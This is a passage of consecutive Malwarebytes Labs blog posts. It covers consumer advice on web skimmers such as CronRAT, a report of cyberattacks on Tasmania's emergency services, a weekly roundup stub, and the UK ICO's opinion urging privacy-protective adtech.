What that means from a digital skimming standpoint is that you are always accepting a level of risk by shopping online and placing trust in the merchant’s ability to keep their systems safe. You should be aware of any subtle changes in payment forms and other possible giveaways that a website is not up to par. Without getting too technical, certain things like outdated copyright information or broken HTML elements may be an indication that the store is not keeping their site up to date.

An attacker will first compromise online shops that are vulnerable to attacks, so it makes sense to stay clear of those that are not following best practices.

Safety first

There are lots of things you can do out there in the real world to avoid ATM skimmers and related threats. You can also be proactive in the realm of web-based skimmers targeting the sites you make payments on. Issues such as CronRAT may take a little while longer for various industries to figure out.

While there are varying levels of protection for web purchases, it may be dependent on payment method and/or location. It’s also not great to know that if payment data has been compromised, it’s possible the criminals have grabbed other data too. While this may not be the most reassuring message to take into the new year, forewarned is most definitely forearmed.

The post CronRAT targets Linux servers with e-commerce attacks appeared first on Malwarebytes Labs.

Hackers all over the world are targeting Tasmania’s emergency services

Emergency services (under which the police, fire, and emergency medical services departments fall) are vital infrastructure for any country or state. When those services come under threat from either physical or cyber attackers, citizens’ lives are put at risk as well.

Unfortunately, not every place has the means and manpower of the US to put pressure on cybercriminals who dare target its vital infrastructure. And this is probably why some threat actors would rather take their chances targeting other countries for profit.

As a case in point, the island state of Tasmania in Australia continues to be subjected to multiple cyberattacks on its emergency services from all around the globe.

Hackers have tried breaking into Tasmania Police employee accounts over 800 times in the last 12 months, according to an internal report from the Department of Police, Fire and Emergency Management (DPFEM) that was obtained by ABC News Australia.

And that’s just the tip of the iceberg. The report also revealed:

  • CCTV cameras have been compromised
  • A section of the Tasmania Fire Service website was taken over by one or more unknown parties for at least two weeks
  • Two-factor authentication (2FA) was defeated on five occasions on devices owned by DPFEM employees

The DPFEM is said to store and maintain personally identifiable data and classified information, which makes it a goldmine for hackers. If it were ever completely compromised, DPFEM said, it would not be able to bounce back as quickly as Federal Group, Tasmania’s casino operator, did after falling victim to a ransomware attack by the DarkSide hacking group.

“Unlike Federal Group, DPFEM will not be able to recover its entire business operation in under six weeks, even with external assistance, because its Information Security Program is not mature enough to determine the full extent of a system compromise and, therefore, will be required to take all its systems back to bare metal to ensure environmental integrity,” the report said.

The report recommended that the Tasmania Police and Fire Service invest $550,221 annually to “keep the department cyber safe.”

The post Hackers all over the world are targeting Tasmania’s emergency services appeared first on Malwarebytes Labs.

A week in security (Nov 22 – Nov 28)

Last week on Malwarebytes Labs

Stay safe!

The post A week in security (Nov 22 – Nov 28) appeared first on Malwarebytes Labs.

ICO challenges adtech to step up privacy protection

The UK Information Commissioner’s Office (ICO) wants the advertising industry to come up with new initiatives that address the risks of adtech, and take account of data protection requirements from the outset.

The ICO is an independent body set up to uphold information rights. The technology that is currently in use by the advertising industry has the potential to be highly privacy intrusive. And the ICO has the right to issue, on initiative or on request, opinions to Parliament, government, other institutions or bodies, and the public, on any issue related to the protection of personal data.

The problem

The concept is simple: Advertisers want to show adverts to individuals who are likely to buy their product, and consumers prefer to see adverts that are relevant to them over those that are not. To accomplish this, the advertising industry has come up with a complex web of data processing which includes profiling, tracking, auctioning, and sharing of personal data.

That approach leads to advertisers knowing far more about people than they need to, and having to store and secure all that data.

Moves in the right direction

In recent years, the ad industry has developed several initiatives for less intrusive technology to address these privacy risks. These include proposals from Google and other market participants to phase out the use of third-party cookies, and other forms of cross-site tracking, and replace them with alternatives.

Federated Learning of Cohorts (FLoC) is one of the initiatives by Google that aims to thread the needle of offering people targeted ads while respecting their privacy. That initiative got off to a bad start when it became known that Google had quietly added millions of Chrome users to a FLoC pilot without asking them.

Other recent developments highlighted by the ICO include:

  • Proposals like FLoC that aim to phase out third-party cookies and replace them with alternatives.
  • Increases in the transparency of online tracking, such as Apple’s App Tracking Transparency, which has had a notable impact—both in terms of the number of users exercising control over tracking, as well as the market itself.
  • Mechanisms to enable individuals to indicate their privacy preferences in simple and effective ways.
  • Developments by browser developers to include tracking prevention in their software.

As an example of the last point, Enhanced Tracking Protection in Firefox automatically blocks trackers that collect information about your browsing habits and interests. But this is not as effective as you might hope. Blocking third-party cookies and related mechanisms does partially restrict cross-site trackers, but as long as a tracker is still being loaded in your browser, it can still track you. Not as easy as it was before, but tracking is still tracking, and the most prevalent cross-site trackers (looking at you, Google and Facebook) are certainly still tracking you.

Google

Google’s status in the digital economy means that any proposal it puts forward has a significant impact. Not just because of the market share of its browser, but also due to the services it offers individuals and organizations, and the large role it plays in the digital advertising market.

In 2019, Google announced its vision for the Google Privacy Sandbox. The building blocks for this were essentially:

  1. Most aspects of the web need money to survive, and advertising that relies on cookies is the dominant revenue stream.
  2. Blocking ads or cookies can prevent advertisers from generating revenue, threatening #1.
  3. If you block easily controllable methods like cookies, advertisers may turn to other techniques, like fingerprinting, that are harder for users to control.

Expectations

The ICO is attempting to insert itself into the rapidly evolving situation around adtech by means of a recently published opinion:

There is a window of opportunity for proposal developers to reflect on genuinely applying a data protection by design approach. The Commissioner therefore encourages Google and other participants to demonstrate how their proposals meet the expectations this opinion outlines.

The ICO is encouraging Google and other advertisers to demonstrate new proposals that can meet a set of expectations set out in the Opinion. It wants to see proposals to remove the use of technologies that lead to intrusive and unaccountable processing of personal data and device information, which increases the risks of harm to individuals.

The ICO says it expects any proposal to:

  • Engineer data protection requirements by default into the design of the initiative.
  • Offer users the choice of receiving adverts without tracking, profiling or targeting based on personal data.
  • Be transparent about how and why personal data is processed, and who is responsible for that processing.
  • Articulate the specific purposes for processing personal data, and demonstrate how this is fair, lawful and transparent.
  • Address existing privacy risks and mitigate any new privacy risks that their proposal introduces.

Like the ICO, we are looking forward to more privacy-focused ways of delivering targeted advertising.

The post ICO challenges adtech to step up privacy protection appeared first on Malwarebytes Labs.